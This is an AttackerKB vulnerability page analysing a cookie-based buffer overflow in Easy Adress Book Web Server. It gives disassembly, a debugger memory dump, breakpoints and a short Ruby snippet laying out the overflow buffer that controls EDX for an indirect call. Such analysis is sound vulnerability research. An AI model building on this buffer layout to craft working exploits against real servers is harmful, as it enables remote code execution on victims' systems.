Unknown
Easy Adress Book Web Server Buffer Overflow
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Unknown
(1 user assessed)Unknown
(1 user assessed)Unknown
Unknown
Unknown
Easy Adress Book Web Server Buffer Overflow
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Easy Adress Book Web Server suffers from a vulnerability while processing a user-supplied cookie, specifically the UserID parameter, which allows the attacker to cause a buffer overflow and result a crash or gain arbitrary code execution under the context of the user. This was originally discovered by Tracy Turben, and was submitted to Metasploit as an exploit module by Muhammet Dilmac (of ADEOSec).
Add Assessment
Technical Analysis
-
In addition, ```var_DE64``` is used to store the ```UserID``` information by a simple memcpy routine:
.text:0040F2D7 mov eax, ecx
.text:0040F2D9 mov esi, edi
.text:0040F2DB mov edi, edx
.text:0040F2DD push ebx
.text:0040F2DE shr ecx, 2
.text:0040F2E1 rep movsd
If ```UserID``` has a value of "AAAA", in a debugger the buffers would look like this:
01EEB494 41414141 AAAA
01EEB498 00000000 ….
01EEB49C 00000000 ….
01EEB4A0 00000000 ….
01EEB4A4 00000000 ….
01EEB4A8 00000000 ….
01EEB4AC 00000000 ….
01EEB4B0 00000000 ….
01EEB4B4 00000000 ….
01EEB4B8 00000000 ….
01EEB4BC 00000000 ….
01EEB4C0 00000000 ….
01EEB4C4 00000000 ….
01EEB4C8 00000000 ….
01EEB4CC 00000000 ….
01EEB4D0 00000000 ….
01EEB4D4 01000101 .
01EEB4D8 016EE168 hán ASCII “2.60 ,MyDB Engine,Copyright_2002 MGH Software Inc.”
01EEB4DC 00518470 p„Q. abws.00518470
01EEB4E0 00518470 p„Q. abws.00518470
01EEB4E4 004F2F7C |/O. abws.004F2F7C
01EEB4E8 00000250 P..
In the above example, the range from 01EEB494 to 01EEB4D0 is exactly 64 bytes, this is our ```var_DE64``` buffer. Right below that is our ```var_DE24```, which is what ESI points to at the time of the crash. At the 0x10th byte of ESI is where EDX is, which is used by the ```CALL DWORD [edx+28h]``` instruction. The following code represents this: ```ruby buf = "A" * 64 # 64 bytes for var_DE64 buf << "BBBB" # We start overwriting var_DE24 buffer here buf << "C" * (16-4) # Padding for [ESI+10h] so the 16th DWORD is our DDDD buf << "DDDD" # EDX (which will be used by the CALL DWORD [edx+28h] instruction) buf << "E" * (4 * 100) # Extra padding so we can see the overflow better
Since the overflow ends up writing an object in var_DE24
and gets used by the function,
this results a type confusion (a string being treated as an object).
Breakpoints
- The first breakpoint is the alloca_probe call
- The second breakpoint is the destination buffer for the mempcy that copies the UserID value to
var_DE64
- The third is the beginning of the vulnerable function
0:006> bl 0 e 0040f10a 0001 (0001) 0:**** abws+0xf10a 1 e 0040f2db 0001 (0001) 0:**** abws+0xf2db 2 e 0040f0f0 0001 (0001) 0:**** abws+0xf0f0
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportGeneral Information
References
Miscellaneous
Additional Info
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: